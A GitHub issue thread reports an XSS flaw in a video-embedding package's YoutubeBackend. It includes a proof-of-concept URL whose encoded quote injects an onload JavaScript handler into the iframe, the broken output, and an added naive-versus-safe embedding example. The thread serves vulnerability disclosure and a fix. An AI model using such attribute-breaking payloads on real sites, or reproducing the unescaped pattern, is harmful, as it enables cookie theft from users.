XSS possible in YoutubeBackend with user-provided URL
Remiz opened this issue · comments
Remi commented
Hi,
I think I've noticed a possible XSS using this package when users are allowed to provide URLs.
Here is the code I've used to reproduce the issue:
import embed_video.backends
url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = embed_video.backends.detect_backend(url)
video.is_secure = True
print(video.get_embed_code(800, 400))
And here is the result of the embedded code:
<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>
It looks like the URL-encoded double quotes are decoded by urlparse.parse_qs somehow.
Aleksi Häkli commented
Hi and thanks for catching this.
The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?
Aleksi Häkli commented
Fixed by #187
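Added example, not part of the issue thread and not the package's code or the fix in #187: a standard-library sketch of why a percent-encoded quote survives into the iframe, next to a validating and escaping alternative. The names `naive_embed`, `safe_embed`, `ALLOWED_HOSTS`, `VIDEO_ID` and `SAMPLE_URL` are hypothetical, and the 11-character video id pattern is an assumption about YouTube ids.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample shaped like the report: %22 hides a double quote in "v".
SAMPLE_URL = "https://www.youtube.com/watch?v=C0DPdy98e4c%22%20onload=%22alert(1)"

ALLOWED_HOSTS = {"youtube.com", "www.youtube.com", "m.youtube.com"}  # assumption
VIDEO_ID = re.compile(r"[A-Za-z0-9_-]{11}")  # assumption: usual id shape


def naive_embed(url):
    """Simplified model of the flaw: the decoded value goes into HTML as-is."""
    # parse_qs percent-decodes values, so %22 comes back as a literal '"'.
    video_id = parse_qs(urlparse(url).query)["v"][0]
    return '<iframe src="https://www.youtube.com/embed/%s"></iframe>' % video_id


def safe_embed(url, width, height):
    """Validate the URL, rebuild src from trusted parts, escape the attribute."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("not a YouTube watch URL")
    ids = parse_qs(parts.query).get("v", [])
    # Exactly one id, matching the whole pattern: no quotes, spaces or '?'.
    if len(ids) != 1 or not VIDEO_ID.fullmatch(ids[0]):
        raise ValueError("invalid video id")
    src = "https://www.youtube.com/embed/" + ids[0]
    # Escaping is kept as a second layer even though validation already
    # excludes quote characters.
    return '<iframe width="%d" height="%d" src="%s"></iframe>' % (
        int(width), int(height), html.escape(src, quote=True))


if __name__ == "__main__":
    print(naive_embed(SAMPLE_URL))  # attribute boundary is broken
    try:
        safe_embed(SAMPLE_URL, 800, 400)
    except ValueError as exc:
        print("rejected:", exc)
    print(safe_embed("https://www.youtube.com/watch?v=C0DPdy98e4c", 800, 400))
```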